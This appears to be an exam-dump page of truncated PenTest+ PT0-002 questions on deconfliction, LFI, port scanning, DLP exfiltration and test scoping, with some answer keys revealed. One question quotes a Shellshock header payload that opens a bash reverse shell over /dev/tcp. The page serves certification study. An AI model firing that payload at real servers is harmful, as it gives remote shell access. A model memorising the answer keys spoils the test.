PT0-002 exam

Deconfliction is necessary when the penetration test:A . determines that proprietary information is being stored in cleartext.B . occurs during the monthly vulnerability scanning.C . uncovers indicators of prior compromise over the course of the assessment.D . proceeds in parallel with a criminal digital forensic investigation.View AnswerAnswer: D Explanation: Deconfliction...

DRAG DROP During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan. INSTRUCTIONS Analyze the code segments to determine which sections are needed to complete a port scanning...

During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.)A . Cross-site scriptingB . Server-side request forgeryC...

A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?A . SteganographyB . Metadata removalC . EncryptionD . Encode64View AnswerAnswer: B Explanation: All other answers are a...

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?A . Analyze the malware to see what it does.B . Collect the proper evidence and then remove the malware.C . Do a root-cause analysis to find out...

A company uses a cloud provider with shared network bandwidth to host a web application on dedicated servers. The company's contact with the cloud provider prevents any activities that would interfere with the cloud provider's other customers. When engaging with a penetration-testing company to test the application, which of the...

A penetration tester writes the following script: Which of the following is the tester performing?A . Searching for service vulnerabilitiesB . Trying to recover a lost bind shellC . Building a reverse shell listening on specified portsD . Scanning a network for specific open portsView AnswerAnswer: D Explanation: -z zero-I/O...

Given the following script: Which of the following BEST characterizes the function performed by lines 5 and 6?A . Retrieves the start-of-authority information for the zone on DNS server 10.10.10.10B . Performs a single DNS query for www.comptia.org and prints the raw data outputC . Loops through variable b to...

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code: exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”} Which of the following edits should the tester make to the...

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive?A . Run another scanner to compare.B . Perform a manual test on the server.C . Check the...